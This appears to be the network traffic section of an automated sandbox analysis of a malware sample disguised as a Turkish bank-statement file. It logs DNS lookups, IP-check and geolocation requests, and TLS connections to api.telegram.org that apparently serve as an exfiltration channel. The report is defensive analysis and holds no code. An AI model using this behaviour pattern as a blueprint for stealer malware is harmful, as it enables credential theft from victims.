Dec 10, 2024 14:07:52.218101978 CET	49749	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:52.218420982 CET	49749	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:52.218436003 CET	443	49749	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:52.265224934 CET	49747	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:52.966473103 CET	443	49748	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:52.974400997 CET	49748	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:52.974420071 CET	443	49748	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:53.413197041 CET	443	49748	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:53.413275957 CET	443	49748	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:53.413351059 CET	49748	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:53.413804054 CET	49748	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:53.416871071 CET	49746	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:53.417908907 CET	49751	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:53.430263042 CET	443	49749	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:53.437242985 CET	49749	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:53.437267065 CET	443	49749	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:53.536669970 CET	80	49746	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:53.536815882 CET	49746	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:53.537565947 CET	80	49751	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:53.537659883 CET	49751	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:53.537935972 CET	49751	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:53.657255888 CET	80	49751	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:53.875971079 CET	443	49749	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:53.876068115 CET	443	49749	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:53.876126051 CET	49749	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:53.876496077 CET	49749	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:53.879985094 CET	49747	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:53.881195068 CET	49752	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:53.999964952 CET	80	49747	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:54.000026941 CET	49747	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:54.000462055 CET	80	49752	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:54.000541925 CET	49752	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:54.000767946 CET	49752	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:54.119950056 CET	80	49752	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:54.889584064 CET	80	49751	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:54.891295910 CET	49753	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:54.891338110 CET	443	49753	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:54.891722918 CET	49753	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:54.891722918 CET	49753	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:54.891752958 CET	443	49753	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:54.937113047 CET	49751	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:55.304212093 CET	80	49752	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:55.305428982 CET	49754	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:55.305479050 CET	443	49754	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:55.305562973 CET	49754	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:55.305870056 CET	49754	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:55.305886984 CET	443	49754	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:55.359019041 CET	49752	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:56.102632046 CET	443	49753	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:56.104691029 CET	49753	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:56.104716063 CET	443	49753	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:56.549809933 CET	443	49754	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:56.551723957 CET	49754	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:56.551750898 CET	443	49754	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:56.559566021 CET	443	49753	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:56.559689999 CET	443	49753	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:56.559767008 CET	49753	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:56.560336113 CET	49753	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:56.563519001 CET	49751	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:56.564706087 CET	49755	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:56.683357000 CET	80	49751	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:56.683453083 CET	49751	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:56.684179068 CET	80	49755	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:56.684257030 CET	49755	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:56.684415102 CET	49755	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:56.803906918 CET	80	49755	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:57.009322882 CET	443	49754	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:57.009399891 CET	443	49754	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:57.009495974 CET	49754	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:57.010015965 CET	49754	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:57.013608932 CET	49752	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:57.014844894 CET	49756	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:57.133222103 CET	80	49752	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:57.133306980 CET	49752	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:57.134319067 CET	80	49756	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:57.134391069 CET	49756	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:57.134562969 CET	49756	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:57.253957987 CET	80	49756	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:57.988333941 CET	80	49755	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:57.989567041 CET	49757	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:57.989603043 CET	443	49757	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:57.989689112 CET	49757	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:57.989917040 CET	49757	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:57.989929914 CET	443	49757	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:58.030852079 CET	49755	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:58.437798977 CET	80	49756	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:58.439219952 CET	49758	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:58.439285040 CET	443	49758	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:58.439410925 CET	49758	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:58.439702034 CET	49758	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:58.439723015 CET	443	49758	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:58.483973980 CET	49756	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:59.201967955 CET	443	49757	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:59.204998016 CET	49757	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:59.205022097 CET	443	49757	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:59.650544882 CET	443	49757	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:59.650631905 CET	443	49757	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:59.651221037 CET	49757	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:59.651221037 CET	49757	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:59.670610905 CET	443	49758	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:59.673358917 CET	49758	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:59.673383951 CET	443	49758	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:59.820343971 CET	49755	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:59.940193892 CET	80	49755	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:59.940320969 CET	49755	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:59.958600998 CET	49759	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:07:59.958632946 CET	443	49759	149.154.167.220	192.168.2.6
Dec 10, 2024 14:07:59.958709955 CET	49759	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:07:59.959250927 CET	49759	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:07:59.959266901 CET	443	49759	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:00.115855932 CET	443	49758	172.67.177.134	192.168.2.6
Dec 10, 2024 14:08:00.115931988 CET	443	49758	172.67.177.134	192.168.2.6
Dec 10, 2024 14:08:00.116010904 CET	49758	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:08:00.116450071 CET	49758	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:08:00.119399071 CET	49756	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:08:00.119997025 CET	49760	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:08:00.239070892 CET	80	49756	132.226.247.73	192.168.2.6
Dec 10, 2024 14:08:00.239126921 CET	49756	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:08:00.239295959 CET	80	49760	132.226.247.73	192.168.2.6
Dec 10, 2024 14:08:00.239389896 CET	49760	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:08:00.239660978 CET	49760	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:08:00.359167099 CET	80	49760	132.226.247.73	192.168.2.6
Dec 10, 2024 14:08:01.385550976 CET	443	49759	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:01.385643959 CET	49759	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:01.389091969 CET	49759	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:01.389106035 CET	443	49759	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:01.389380932 CET	443	49759	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:01.390892029 CET	49759	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:01.435332060 CET	443	49759	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:01.546425104 CET	80	49760	132.226.247.73	192.168.2.6
Dec 10, 2024 14:08:01.548481941 CET	49761	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:08:01.548530102 CET	443	49761	172.67.177.134	192.168.2.6
Dec 10, 2024 14:08:01.548603058 CET	49761	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:08:01.549108028 CET	49761	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:08:01.549120903 CET	443	49761	172.67.177.134	192.168.2.6
Dec 10, 2024 14:08:01.593331099 CET	49760	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:08:01.904679060 CET	443	49759	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:01.904736996 CET	443	49759	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:01.904834986 CET	49759	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:02.029768944 CET	49759	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:02.761292934 CET	443	49761	172.67.177.134	192.168.2.6
Dec 10, 2024 14:08:02.763216972 CET	49761	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:08:02.763243914 CET	443	49761	172.67.177.134	192.168.2.6
Dec 10, 2024 14:08:03.215985060 CET	443	49761	172.67.177.134	192.168.2.6
Dec 10, 2024 14:08:03.216057062 CET	443	49761	172.67.177.134	192.168.2.6
Dec 10, 2024 14:08:03.216147900 CET	49761	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:08:03.216622114 CET	49761	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:08:03.230993986 CET	49762	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:03.231030941 CET	443	49762	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:03.231044054 CET	49760	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:08:03.231106043 CET	49762	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:03.231553078 CET	49762	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:03.231570959 CET	443	49762	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:03.351073980 CET	80	49760	132.226.247.73	192.168.2.6
Dec 10, 2024 14:08:03.351196051 CET	49760	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:08:04.592708111 CET	443	49762	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:04.592888117 CET	49762	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:04.594733000 CET	49762	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:04.594742060 CET	443	49762	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:04.594983101 CET	443	49762	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:04.596442938 CET	49762	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:04.639338970 CET	443	49762	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:05.101501942 CET	443	49762	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:05.101572037 CET	443	49762	149.154.167.220	192.168.2.6
Dec 10, 2024 14:08:05.101615906 CET	49762	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:05.104192972 CET	49762	443	192.168.2.6	149.154.167.220
Dec 10, 2024 14:08:16.573812008 CET	49724	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:08:19.547615051 CET	49730	80	192.168.2.6	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 14:07:31.681636095 CET	59342	53	192.168.2.6	1.1.1.1
Dec 10, 2024 14:07:31.819650888 CET	53	59342	1.1.1.1	192.168.2.6
Dec 10, 2024 14:07:33.760467052 CET	61207	53	192.168.2.6	1.1.1.1
Dec 10, 2024 14:07:33.897519112 CET	53	61207	1.1.1.1	192.168.2.6
Dec 10, 2024 14:07:59.821096897 CET	51164	53	192.168.2.6	1.1.1.1
Dec 10, 2024 14:07:59.957818031 CET	53	51164	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 14:07:31.681636095 CET	192.168.2.6	1.1.1.1	0x7827	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:33.760467052 CET	192.168.2.6	1.1.1.1	0x54f4	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:59.821096897 CET	192.168.2.6	1.1.1.1	0x29e5	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 14:07:31.819650888 CET	1.1.1.1	192.168.2.6	0x7827	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 14:07:31.819650888 CET	1.1.1.1	192.168.2.6	0x7827	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:31.819650888 CET	1.1.1.1	192.168.2.6	0x7827	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:31.819650888 CET	1.1.1.1	192.168.2.6	0x7827	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:31.819650888 CET	1.1.1.1	192.168.2.6	0x7827	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:31.819650888 CET	1.1.1.1	192.168.2.6	0x7827	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:33.897519112 CET	1.1.1.1	192.168.2.6	0x54f4	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:33.897519112 CET	1.1.1.1	192.168.2.6	0x54f4	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:59.957818031 CET	1.1.1.1	192.168.2.6	0x29e5	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49717	132.226.247.73	80	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:31.956165075 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:33.259552002 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e7a5425c6ac80b14d2b952c19eecaefd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 10, 2024 14:07:33.265702963 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:33.692115068 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7b430a794e1f8e9a7f86dea34e4ef565 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 10, 2024 14:07:35.663484097 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:36.091520071 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e6deb44597ad837dfaa877b45144908b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49720	132.226.247.73	80	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:35.913079977 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:37.175632000 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ebc3a4cd4758bea9982567472baf416b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 10, 2024 14:07:37.180768013 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:37.604464054 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b06978d5cafa0cd3fc6e7471f782bfe0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 10, 2024 14:07:39.376823902 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:39.801083088 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e24ecf36a69047395cda2c326db5d4c6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49724	132.226.247.73	80	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:37.895793915 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:39.284348965 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 80e6d598b59f3367dc36d0a4d587b8fe Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49728	132.226.247.73	80	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:41.078166962 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:42.431595087 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a32ff0ba56cda2b1881d36fade64822b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49730	132.226.247.73	80	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:41.593873978 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:42.897459984 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2aa59cb612b85323eaae38a6ff59e5e9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49735	132.226.247.73	80	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:44.221330881 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
